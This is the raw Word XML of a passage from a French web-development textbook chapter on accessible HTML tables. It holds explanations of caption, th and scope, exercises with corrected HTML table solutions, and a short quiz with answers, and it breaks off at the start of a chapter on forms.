            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dl</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Tableau de mise en page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Afficher un calendrier</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Grille CSS</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Tableau si les dates sont des données</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Aligner deux colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grid</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Tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le calendrier illustre le cas limite : s'il s'agit d'un sélecteur de dates, c'est une grille interactive ; s'il s'agit d'un planning consultable avec des ressources en lignes et des jours en colonnes, c'est un tableau.</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TEST DES TROIS SECONDES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cachez le CSS. Si le contenu se lit encore dans l'ordre attendu et que les en-têtes restent compréhensibles, le tableau est correct. Sinon, c'est une mise en page déguisée.</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tableau croise des données ; il ne met pas en page.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caption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donne un titre, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donnent le sens.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en-têtes de lignes sont aussi importants que ceux des colonnes.</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colspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rowspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compliquent la lecture : à limiter.</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Sur mobile, préférer le défilement horizontal accessible au clavier.</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Sans CSS, un bon tableau reste compréhensible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les données sont structurées. Place à l'interaction : les formulaires, point de contact entre l'utilisateur et le système.</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7.1 — Comparer trois offres</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Construisez un tableau comparant trois offres d'hébergement sur quatre critères : prix, stockage, bande passante, support.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Ajoutez un titre de tableau et des en-têtes de colonnes.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Indiquez la meilleure offre par un moyen non visuel.</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Ajoutez un pied de tableau avec la mention des tarifs annuels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 7.2 — Réparer un tableau inaccessible</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 xml:space="preserve">Ce tableau utilise des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> partout et n'a ni titre ni en-tête.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 xml:space="preserve">Identifiez les cellules qui devraient être des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th</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 xml:space="preserve">Ajoutez un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nécessaires.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Proposez une version accessible au clavier sur mobile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 7.3 — Choisir la bonne structure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pour chaque cas, indiquez la structure HTML appropriée et justifiez.</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Une grille de tarifs à trois colonnes.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Un planning de salles sur une semaine.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Une fiche technique de produit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une galerie de photos.</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7.1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&lt;table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;caption&gt;Comparatif des offres d'hébergement (tarifs mensuels)&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Critère&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Essentiel&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Pro&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Entreprise&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;&lt;th scope="row"&gt;Prix&lt;/th&gt;&lt;td&gt;4 €&lt;/td&gt;&lt;td&gt;12 €&lt;/td&gt;&lt;td&gt;39 €&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;Stockage&lt;/th&gt;&lt;td&gt;10 Go&lt;/td&gt;&lt;td&gt;100 Go&lt;/td&gt;&lt;td&gt;500</w:t>
        <w:br/>
        <w:t xml:space="preserve">      Go&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;Bande</w:t>
        <w:br/>
        <w:t xml:space="preserve">      passante&lt;/th&gt;&lt;td&gt;Illimitée&lt;/td&gt;&lt;td&gt;Illimitée&lt;/td&gt;&lt;td&gt;Illimitée&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;Support&lt;/th&gt;&lt;td&gt;E-mail&lt;/td&gt;&lt;td&gt;E-mail 24</w:t>
        <w:br/>
        <w:t xml:space="preserve">      h&lt;/td&gt;&lt;td&gt;Téléphone 24/7&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tfoot&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;&lt;th scope="row" colspan="4"&gt;Tarifs annuels, hors taxes.&lt;/th&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tfoot&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La « meilleure » offre ne doit pas être signalée par la couleur seule : ajoutez un texte (« recommandé ») ou un symbole explicité, sinon l'information disparaît pour une partie des lecteurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le pied de tableau porte les mentions générales. Attention : une cellule fusionnée sur quatre colonnes doit rester lisible ; préférez parfois un paragraphe après le tableau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 7.2</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&lt;table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;caption&gt;Résultats du contrôle technique&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Véhicule&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Date&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Résultat&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;AB-123-CD&lt;/th&gt;&lt;td&gt;12/03/2026&lt;/td&gt;&lt;td&gt;Favorable&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;EF-456-GH&lt;/th&gt;&lt;td&gt;14/03/2026&lt;/td&gt;&lt;td&gt;Défavorable&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les cellules de la première colonne décrivent la ligne : ce sont des en-têtes de ligne, donc des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope="row"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sur mobile, enveloppez le tableau dans une région défilante avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex="0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrivant le contenu, puis autorisez le défilement horizontal en CSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 7.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une grille de tarifs compare des offres sur des critères : tableau, sauf si chaque offre contient beaucoup de texte, auquel cas des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> comparés par une liste de définitions sont plus lisibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un planning croise des salles et des jours : tableau, avec en-têtes de colonnes (jours) et de lignes (salles).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une fiche technique est une suite de couples propriété/valeur : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une galerie est une collection d'images autonomes : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si l'ordre n'a pas de sens.</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 élément donne un titre à un tableau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title</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caption</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thead</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h2</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope="col"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur une cellule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th</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À fusionner deux colonnes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À indiquer que l'en-tête s'applique à la colonne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À colorer la colonne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À trier la colonne</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Pourquoi ne pas utiliser de tableau pour la mise en page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Le HTML devient invalide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Les technologies d'assistance annoncent une structure de données inexistante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Les tableaux sont obsolètes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Cela empêche l'impression</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Quelle propriété CSS permet le défilement horizontal d'un tableau large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overflow-x: auto</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display: block</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table-layout: fixed</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white-space: nowrap</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 xml:space="preserve">Combien de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut contenir un tableau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Aucun</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Un seul</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Un par section</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Autant que de colonnes</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le titre natif du tableau ; il doit être le premier élément enfant de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclare la portée de l'en-tête, ce qui permet aux lecteurs d'écran d'annoncer la bonne étiquette pour chaque cellule.</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Le tableau est un objet sémantique : l'utiliser pour la mise en page produit des annonces trompeuses et un ordre de lecture incohérent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow-x: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un conteneur permet le défilement ; ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex="0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour l'accès au clavier.</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Un tableau possède au plus un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, placé en premier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>8. Formulaires HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
